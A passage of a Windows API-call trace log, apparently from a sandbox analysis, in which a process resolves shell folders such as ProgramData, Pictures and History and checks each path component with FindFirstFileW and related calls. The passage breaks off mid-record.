(in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0 [0077.461] GetLastError () returned 0x12 [0077.461] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.461] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fadc*="c:\\Program Files (x86)") returned 1 [0077.461] SysReAllocStringLen (in: pbstr=0x28fe14*="c:\\Program Files (x86)", psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fe14*="c:\\Program Files (x86)\\") returned 1 [0077.462] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fad8*="c:\\Program Files (x86)\\") returned 1 [0077.462] SysReAllocStringLen (in: pbstr=0x28fe14*="c:\\Program Files (x86)\\", psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fe14*="c:\\Program Files (x86)") returned 1 [0077.462] SysReAllocStringLen (in: pbstr=0x28fe18*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fe18*="c:\\Program Files (x86)") returned 1 [0077.462] SysReAllocStringLen (in: pbstr=0x332006c*=0x0, psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x332006c*="c:\\Program Files (x86)\\") returned 1 [0077.462] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x3323b80 | out: pszPath="C:\\ProgramData") returned 0x0 [0077.463] CharLowerBuffW (in: lpsz="C:\\ProgramData", cchLength=0xe | out: lpsz="c:\\programdata") returned 0xe [0077.463] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\programdata", len=0xe | out: pbstr=0x332009c*="c:\\programdata") returned 1 [0077.463] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.464] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="programdata", len=0xb | out: pbstr=0x33200c0*="programdata") returned 1 [0077.464] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.464] SysReAllocStringLen (in: pbstr=0x28fe08*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe08*="c:\\") returned 1 [0077.464] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="programdata", len=0xb | out: pbstr=0x28fae8*="programdata") returned 1 [0077.464] FindFirstFileW (in: lpFileName="c:\\programdata" (normalized: "c:\\programdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41b67910, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x41b67910, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 0xe3c308 [0077.464] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41b67910, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x41b67910, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 0 [0077.464] GetLastError () returned 0x12 [0077.464] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.465] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\ProgramData", len=0xe | out: pbstr=0x28fadc*="c:\\ProgramData") returned 1 [0077.465] SysReAllocStringLen (in: pbstr=0x28fe08*="c:\\ProgramData", psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x28fe08*="c:\\ProgramData\\") returned 1 [0077.465] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x28fad8*="c:\\ProgramData\\") returned 1 [0077.466] SysReAllocStringLen (in: pbstr=0x28fe08*="c:\\ProgramData\\", psz="c:\\ProgramData", len=0xe | out: pbstr=0x28fe08*="c:\\ProgramData") returned 1 [0077.466] SysReAllocStringLen (in: pbstr=0x28fe0c*=0x0, psz="c:\\ProgramData", len=0xe | out: pbstr=0x28fe0c*="c:\\ProgramData") returned 1 [0077.466] SysReAllocStringLen (in: pbstr=0x3320070*=0x0, psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x3320070*="c:\\ProgramData\\") returned 1 [0077.466] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0x3323b80 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0077.466] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\Common Files", cchLength=0x23 | out: lpsz="c:\\program files (x86)\\common files") returned 0x23 [0077.466] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\program files (x86)\\common files", len=0x23 | out: pbstr=0x332009c*="c:\\program files (x86)\\common files") returned 1 [0077.466] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.467] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x33200c0*="program files (x86)") returned 1 [0077.467] SysReAllocStringLen (in: pbstr=0x33200e0*=0x0, psz="common files", len=0xc | out: pbstr=0x33200e0*="common files") returned 1 [0077.467] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.467] SysReAllocStringLen (in: pbstr=0x28fdfc*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdfc*="c:\\") returned 1 [0077.467] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x28fae8*="program files (x86)") returned 1 [0077.467] FindFirstFileW (in: lpFileName="c:\\program files (x86)" (normalized: "c:\\program files (x86)"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0xe3c308 [0077.467] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0 [0077.467] GetLastError () returned 0x12 [0077.467] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.468] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fadc*="c:\\Program Files (x86)") returned 1 [0077.468] SysReAllocStringLen (in: pbstr=0x28fdfc*="c:\\Program Files (x86)", psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fdfc*="c:\\Program Files (x86)\\") returned 1 [0077.468] SysReAllocStringLen (in: pbstr=0x28fae8*="program files (x86)", psz="common files", len=0xc | out: pbstr=0x28fae8*="common files") returned 1 [0077.468] FindFirstFileW (in: lpFileName="c:\\Program Files (x86)\\common files" (normalized: "c:\\program files (x86)\\common files"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc80a8680, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc80a8680, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 0xe3c308 [0077.468] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc80a8680, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc80a8680, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 0 [0077.468] GetLastError () returned 0x12 [0077.468] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.468] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Program Files (x86)\\", psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fadc*="c:\\Program Files (x86)\\Common Files") returned 1 [0077.468] SysReAllocStringLen (in: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files", psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0077.469] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fad8*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0077.469] SysReAllocStringLen (in: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files\\", psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fdfc*="c:\\Program Files (x86)\\Common Files") returned 1 [0077.469] SysReAllocStringLen (in: pbstr=0x28fe00*=0x0, psz="c:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fe00*="c:\\Program Files (x86)\\Common Files") returned 1 [0077.469] SysReAllocStringLen (in: pbstr=0x3320074*=0x0, psz="c:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x3320074*="c:\\Program Files (x86)\\Common Files\\") returned 1 [0077.470] SHGetFolderPathW (in: hwnd=0x0, csidl=39, hToken=0x0, dwFlags=0x0, pszPath=0x3323b80 | out: pszPath="C:\\Users\\kEecfMwgj\\Pictures") returned 0x0 [0077.470] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Pictures", cchLength=0x1b | out: lpsz="c:\\users\\keecfmwgj\\pictures") returned 0x1b [0077.470] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\users\\keecfmwgj\\pictures", len=0x1b | out: pbstr=0x332009c*="c:\\users\\keecfmwgj\\pictures") returned 1 [0077.470] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.471] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="users", len=0x5 | out: pbstr=0x33200c0*="users") returned 1 [0077.471] SysReAllocStringLen (in: pbstr=0x33200e0*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33200e0*="keecfmwgj") returned 1 [0077.471] SysReAllocStringLen (in: pbstr=0x33200ec*=0x0, psz="pictures", len=0x8 | out: pbstr=0x33200ec*="pictures") returned 1 [0077.472] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.472] SysReAllocStringLen (in: pbstr=0x28fdf0*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdf0*="c:\\") returned 1 [0077.472] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0077.472] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xe3c308 [0077.472] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0077.472] GetLastError () returned 0x12 [0077.472] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.473] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0077.473] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdf0*="c:\\Users\\") returned 1 [0077.473] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0077.473] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0xe3c308 [0077.473] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0077.473] GetLastError () returned 0x12 [0077.473] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.474] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0077.474] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\") returned 1 [0077.474] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="pictures", len=0x8 | out: pbstr=0x28fae8*="pictures") returned 1 [0077.474] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\pictures" (normalized: "c:\\users\\keecfmwgj\\pictures"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc74c1880, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc74c1880, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 0xe3c308 [0077.474] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc74c1880, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc74c1880, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 0 [0077.474] GetLastError () returned 0x12 [0077.474] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.474] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\Pictures") returned 1 [0077.475] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures", psz="c:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0077.475] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0077.476] SysReAllocStringLen (in: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures\\", psz="c:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fdf0*="c:\\Users\\kEecfMwgj\\Pictures") returned 1 [0077.476] SysReAllocStringLen (in: pbstr=0x28fdf4*=0x0, psz="c:\\Users\\kEecfMwgj\\Pictures", len=0x1b | out: pbstr=0x28fdf4*="c:\\Users\\kEecfMwgj\\Pictures") returned 1 [0077.476] SysReAllocStringLen (in: pbstr=0x3320078*=0x0, psz="c:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x3320078*="c:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0077.476] SHGetFolderPathW (in: hwnd=0x0, csidl=34, hToken=0x0, dwFlags=0x0, pszPath=0x3323b80 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x0 [0077.477] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", cchLength=0x3a | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history") returned 0x3a [0077.477] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history", len=0x3a | out: pbstr=0x332009c*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history") returned 1 [0077.477] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.477] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="users", len=0x5 | out: pbstr=0x33200c0*="users") returned 1 [0077.477] SysReAllocStringLen (in: pbstr=0x33200e0*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33200e0*="keecfmwgj") returned 1 [0077.478] SysReAllocStringLen (in: pbstr=0x33200ec*=0x0, psz="appdata", len=0x7 | out: pbstr=0x33200ec*="appdata") returned 1 [0077.478] SysReAllocStringLen (in: pbstr=0x33200f8*=0x0, psz="local", len=0x5 | out: pbstr=0x33200f8*="local") returned 1 [0077.478] SysReAllocStringLen (in: pbstr=0x3320104*=0x0, psz="microsoft", len=0x9 | out: pbstr=0x3320104*="microsoft") returned 1 [0077.479] SysReAllocStringLen (in: pbstr=0x3320134*=0x0, psz="windows", len=0x7 | out: pbstr=0x3320134*="windows") returned 1 [0077.479] SysReAllocStringLen (in: pbstr=0x3320140*=0x0, psz="history", len=0x7 | out: pbstr=0x3320140*="history") returned 1 [0077.479] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.479] SysReAllocStringLen (in: pbstr=0x28fde4*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fde4*="c:\\") returned 1 [0077.479] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0077.479] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xe3c998 [0077.479] FindNextFileW (in: hFindFile=0xe3c998, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0077.480] GetLastError () returned 0x12 [0077.480] FindClose (in: hFindFile=0xe3c998 | out: hFindFile=0xe3c998) returned 1 [0077.480] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0077.480] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fde4*="c:\\Users\\") returned 1 [0077.480] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0077.480] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0xe3c998 [0077.480] FindNextFileW (in: hFindFile=0xe3c998, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0077.480] GetLastError () returned 0x12 [0077.480] FindClose (in: hFindFile=0xe3c998 | out: hFindFile=0xe3c998) returned 1 [0077.481] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0077.481] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\") returned 1 [0077.481] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0077.481] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0xe3c998 [0077.481] FindNextFileW (in: hFindFile=0xe3c998, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0077.481] GetLastError () returned 0x12 [0077.481] FindClose (in: hFindFile=0xe3c998 | out: hFindFile=0xe3c998) returned 1 [0077.481] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0077.482] SysReAllocStringLen (in: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fde4*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0077.482] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0077.482] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0xe3c998 [0077.482] FindNextFileW (in: hFindFile=0xe3c998, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, 